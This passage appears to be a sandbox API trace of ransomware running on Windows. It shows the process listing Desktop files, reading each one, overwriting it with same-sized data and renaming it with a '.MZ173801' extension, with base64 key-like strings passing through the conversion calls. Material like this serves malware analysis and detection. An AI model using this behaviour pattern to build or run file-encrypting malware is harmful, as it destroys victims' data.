nFileSizeHigh=0x0, nFileSizeLow=0x4618, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="XJ_f36txKuev6.mkv", cAlternateFileName="XJ_F36~1.MKV")) returned 1 [0124.036] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.036] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.037] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\XJ_f36txKuev6.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\xj_f36txkuev6.mkv"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c679c30, ftCreationTime.dwHighDateTime=0x1d5e13c, ftLastAccessTime.dwLowDateTime=0x9f9f16a0, ftLastAccessTime.dwHighDateTime=0x1d5ea34, ftLastWriteTime.dwLowDateTime=0x9f9f16a0, ftLastWriteTime.dwHighDateTime=0x1d5ea34, nFileSizeHigh=0x0, nFileSizeLow=0x4618)) returned 1 [0124.037] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.037] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.038] GetCurrentThreadId () returned 0x1358 [0124.038] GetCurrentThreadId () returned 0x1358 [0124.038] GetCurrentThreadId () returned 0x1358 [0124.038] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.038] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.044] GetCurrentThreadId () returned 0x1358 [0124.044] GetCurrentThreadId () returned 0x1358 [0124.044] GetCurrentThreadId () returned 0x1358 [0124.044] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XJ_f36txKuev6.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\xj_f36txkuev6.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0124.044] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0124.044] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0124.044] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x4618 [0124.045] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0124.045] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x4618, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x4618, lpOverlapped=0x0) returned 1 [0124.046] CloseHandle (hObject=0x410) returned 1 [0124.047] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XJ_f36txKuev6.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\xj_f36txkuev6.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0124.048] WriteFile (in: hFile=0x410, lpBuffer=0x2437b60*, nNumberOfBytesToWrite=0x4618, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2437b60*, lpNumberOfBytesWritten=0x19f9bc*=0x4618, lpOverlapped=0x0) returned 1 [0124.050] CloseHandle (hObject=0x410) returned 1 [0124.051] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\XJ_f36txKuev6.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\xj_f36txkuev6.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\XJ_f36txKuev6.mkv.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\xj_f36txkuev6.mkv.mz173801")) returned 1 [0124.051] GetCurrentThreadId () returned 0x1358 [0124.051] GetCurrentThreadId () returned 0x1358 [0124.052] GetCurrentThreadId () returned 0x1358 [0124.052] GetCurrentThreadId () returned 0x1358 [0124.052] GetCurrentThreadId () returned 0x1358 [0124.052] GetCurrentThreadId () returned 0x1358 [0124.052] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa50b4200, ftCreationTime.dwHighDateTime=0x1d5e933, ftLastAccessTime.dwLowDateTime=0x5c7ddb60, ftLastAccessTime.dwHighDateTime=0x1d5e564, ftLastWriteTime.dwLowDateTime=0x5c7ddb60, ftLastWriteTime.dwHighDateTime=0x1d5e564, nFileSizeHigh=0x0, nFileSizeLow=0x3262, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="XVeVbH-.gif", cAlternateFileName="")) returned 1 [0124.052] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.052] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.052] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\XVeVbH-.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\xvevbh-.gif"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa50b4200, ftCreationTime.dwHighDateTime=0x1d5e933, ftLastAccessTime.dwLowDateTime=0x5c7ddb60, ftLastAccessTime.dwHighDateTime=0x1d5e564, ftLastWriteTime.dwLowDateTime=0x5c7ddb60, ftLastWriteTime.dwHighDateTime=0x1d5e564, nFileSizeHigh=0x0, nFileSizeLow=0x3262)) returned 1 [0124.052] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.052] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.053] GetCurrentThreadId () returned 0x1358 [0124.053] GetCurrentThreadId () returned 0x1358 [0124.053] GetCurrentThreadId () returned 0x1358 [0124.054] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.054] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.133] GetCurrentThreadId () returned 0x1358 [0124.133] GetCurrentThreadId () returned 0x1358 [0124.133] GetCurrentThreadId () returned 0x1358 [0124.133] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XVeVbH-.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\xvevbh-.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0124.133] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0124.133] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0124.134] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3262 [0124.134] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0124.134] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x3262, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x3262, lpOverlapped=0x0) returned 1 [0124.135] 